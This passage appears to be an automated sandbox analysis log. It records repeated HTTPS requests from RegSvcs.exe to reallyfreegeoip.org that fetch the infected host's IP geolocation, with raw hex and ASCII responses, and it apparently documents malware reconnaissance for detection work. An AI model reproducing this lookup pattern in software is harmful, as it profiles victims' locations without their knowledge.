                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.549744188.114.97.34437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-02 19:19:51 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          2025-01-02 19:19:51 UTC865INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:51 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160380
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3g8GrpXYIA9nqNCNrb0C2m2tClmRtLUN7Dx6Zqa%2BsZZP%2B9zGv46GgQdAGz1xLAld9IIwByD0c%2FHz7wiAV3%2FGlEvQouC%2FykXKHGbsAZsLL9Rs%2FTWKCXQnEwu52FXY0TsY%2BuMtcuu%2B"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a64191642cb-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1716&rtt_var=647&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1685912&cwnd=163&unsent_bytes=0&cid=d774e1631dec4e68&ts=158&x=0"
                                          2025-01-02 19:19:51 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.549752188.114.97.34437276C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-02 19:19:52 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          2025-01-02 19:19:52 UTC857INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:52 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160381
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ItONndM6EqK8Q5frN9y8w06ax4merGCewX%2BhAl4RbnP%2Fhgs%2FYL1V5yjK8CUk7xfxIDFUwk2erT4JOgBeOo2xvk1DamjMlAvf8tkEaOOUGyYeRutWCC3Lw7Hbxq%2FIK9Rwa9GhViQT"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a69df0841e3-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1972&min_rtt=1844&rtt_var=783&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1583514&cwnd=218&unsent_bytes=0&cid=04b90e8e088a3926&ts=182&x=0"
                                          2025-01-02 19:19:52 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          8192.168.2.549753188.114.97.34437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-02 19:19:52 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:52 UTC853INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:52 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160382
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9hDFufYcvlB99aT6B6RnDmbBlXSQ%2F1xDC91cB7wbt2EHwa0aMxQCfQcauKDH2Uxm5vGOu%2Bh44uZysf9rzX2jNiOg0jsl6Ngj1ue3h5aTAxfqYLWfuCUsWJ8vYRTBnRTWMnFiXwW2"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a6b9ec24314-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=2402&min_rtt=2325&rtt_var=1027&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=990502&cwnd=188&unsent_bytes=0&cid=8765965ad1b73d35&ts=155&x=0"
                                          2025-01-02 19:19:52 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          9192.168.2.549762188.114.97.34437276C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-02 19:19:53 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:53 UTC865INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:53 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160382
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qmp%2F77QN3k%2F0r%2FIKmJgQboIGl7bFxO%2BVJLMIIgQWVguo1zI8%2FBFsAhjXwWxopvh1vCvsIuJ%2FZvwY%2BVstASMoo3Ykve4hOuZUrQPBbHfiG4EMjIkZQHYA81nqW3H2WnkP%2BH3Efxej"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a70ffbf7283-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1976&min_rtt=1968&rtt_var=754&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1434889&cwnd=244&unsent_bytes=0&cid=2f257e92fd04dcd9&ts=149&x=0"
                                          2025-01-02 19:19:53 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          10192.168.2.549767188.114.97.34437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-02 19:19:53 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:54 UTC851INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:54 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160383
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FhJnXmm8gjEfcI8AkR6Dw9VLJMPk7YJC7Gfz4aZVMX3Hgt%2B6OyNHHZPeczBp1wwtE0XbQi1Q2DaHKwABmb0Iijop2GOHQePTNAidFT0z42djhwg2BDDJyI2J3txlYWieYdUzfT0W"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a72b8ba4286-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1802&min_rtt=1767&rtt_var=687&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1652518&cwnd=252&unsent_bytes=0&cid=5bf65f1fb26c9464&ts=161&x=0"
                                          2025-01-02 19:19:54 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          11192.168.2.549776188.114.97.34437276C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-02 19:19:54 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:54 UTC852INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:54 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160384
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xkgEn3W8H6rYRfFR21At06cm40ETnnphrSxk2xhlIUZsjBtyrTBS4d%2B8xpexrlKcZiQAxePqgcphNLZ6EleUTmZgk1JqS2mYC3KBbrkc2ac9ler6ANPsbJ4Qk6%2Bg4CMdhguLiida"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a786ab0437a-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1690&rtt_var=845&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4238&recv_bytes=699&delivery_rate=397820&cwnd=223&unsent_bytes=0&cid=0b3905842ea45169&ts=168&x=0"
                                          2025-01-02 19:19:54 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          12192.168.2.549777188.114.97.34437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-02 19:19:55 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:55 UTC855INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:55 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160384
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nasrSNpMhYEHXBAZg%2BSlqkBtqOaqXPLVq1c9QLZ1dtVkWWgIgv%2F58SXW3FntKZh3WsEnHC4J9FxWoNnwoDHODO6d4Kc8bRb1Z30FfkGs04dhtTKaSZghyhqZi9WM%2BWlQQwzaGvDt"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a7a1ce30cc2-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1751&min_rtt=1725&rtt_var=665&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1692753&cwnd=176&unsent_bytes=0&cid=388393efc53d12ee&ts=170&x=0"
                                          2025-01-02 19:19:55 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          13192.168.2.549790188.114.97.34437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-02 19:19:56 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          2025-01-02 19:19:56 UTC861INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:56 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160385
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=trnooTk1ndWaY9fjc5adIYiRnEHKLNz4n9btFTh6jf%2BDgPPA%2FiEvUrl0VT35UNlkthEjLoUq8yQ3vmu3YjCUO0URzR0%2FOhdBJv%2F64Iw%2B7JuQtvtsPwmD5nzT%2B6dje5RinuPfLHFN"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a8399ba0f3b-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1665&rtt_var=629&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1734997&cwnd=215&unsent_bytes=0&cid=10d78437e8167e82&ts=154&x=0"
                                          2025-01-02 19:19:56 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          14192.168.2.549798188.114.97.34437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-02 19:19:57 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:57 UTC857INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:57 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160386
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hcRQUQ5R1ATmI7tn58LArvzR6Ktio%2Fh7e%2B9Y9eTMZmDUFryN7wKdNMUqrUVnOMSNIjaHJfOcUc5VuQ7b3YDB2ANsDm8kbdG0WKO%2B3CPhiLEpB4UtRl%2Bqpq54zPg9vUQxWsF9co7V"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a8a5bedef9f-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1963&rtt_var=749&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1449851&cwnd=219&unsent_bytes=0&cid=1d6361cacd34c289&ts=155&x=0"
                                          2025-01-02 19:19:57 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          15192.168.2.549808188.114.97.34437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-02 19:19:59 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:59 UTC855INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:59 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160388
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B6NBncyh8ycHq9q1jLdAawIder5pdoyn6xeG4UEYjqiNim3BbKV9pJjaDOwUOvcEcvOogl9koDV063FcoDInjCrT0Qlb4RALnxNuKst2xxe%2Fo%2BrZsAu0lF9pGYLqqDKECOzR3yse"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a928c2a7c6c-EWR
                                          alt-svc: h3=":443"; ma=86400
